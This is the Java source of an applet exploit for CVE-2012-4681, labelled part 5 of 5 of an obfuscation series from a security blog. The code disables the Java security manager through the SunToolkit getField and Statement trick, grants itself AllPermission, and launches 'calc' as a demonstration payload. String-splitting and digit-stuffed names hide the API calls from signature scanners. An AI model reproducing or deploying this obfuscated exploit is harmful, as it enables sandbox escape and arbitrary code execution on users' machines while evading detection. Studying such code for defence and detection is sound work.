Java 7 Exploit CVE-2012-4681 obfuscation pt. 5/5

/*
 *  Java 7 Exploit CVE-2012-4681 obfuscation pt. 5/5
 *
 *  Affected product versions:
 *  - JDK and JRE 7 Update 6 and before
 *
 * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
 */
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

public class Java extends Applet
{
    // setSecurityManager
    String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
    // file
    char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
    // forName
    String   ad = "or",me = "me", aw = "f", kl = "Na";
    // getField
    String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
    // sun.awt.SunToolkit
    String s = "sun", u = "awt", n = "SunToolkit", dot = ".";

    public void enableSecurity() throws Throwable
    {
        Object ao[] = new Object[2];
        ao[0] = GimmeClass("java.beans.Statement");
        ao[1] = "a"+"c"+"c";

        Expression e = new Expression(GimmeClass(new String(s+dot+u+dot+n)), field.replaceAll("\\d",""), ao);
        e.execute();
        Field field = (Field)e.getValue();

        Class alPerm = Class.forName("jav"+"a."+"sec"+"u"+"rit"+"y.A"+"ll"+"Perm"+"iss"+"ion");
        Class perm   = GimmeClass("java.se"+"curi"+"ty.P"+"ermi"+"ssi"+"ons");
        Object pe= perm.newInstance();
        Method method = pe.getClass().getMethod("ad"+"d", GimmeClass("java."+"secu"+"rity"+".Per"+"mis"+"sion"));
        method.invoke(pe, alPerm.newInstance());

        CodeSource cs = new CodeSource( new URL(new String(file)), new Certificate[0]);
        ProtectionDomain pd = new ProtectionDomain(cs, (Permissions)pe);

        AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });

        Class statClass = GimmeClass("ja"+"va."+"be"+"ans"+".S"+"tat"+"em"+"ent");
        Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
        Object stat = con.newInstance(GimmeClass("java.lan"+"g.S"+"ys"+"tem"),secMan.replaceAll("\\d",""), new Object[1]);
        field.set(stat, ac);
        Method m = stat.getClass().getMethod("ex"+"ecu"+"te");
        m.invoke(stat);
    }

    public void init()
    {
        try
        {
            enableSecurity();
            Runtime.getRuntime().exec("calc");
        }
        catch(Throwable t){}
    }

    private Class GimmeClass(String ps) throws Throwable
    {
        Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
        le.execute();
        return (Class)le.getValue();
    }
}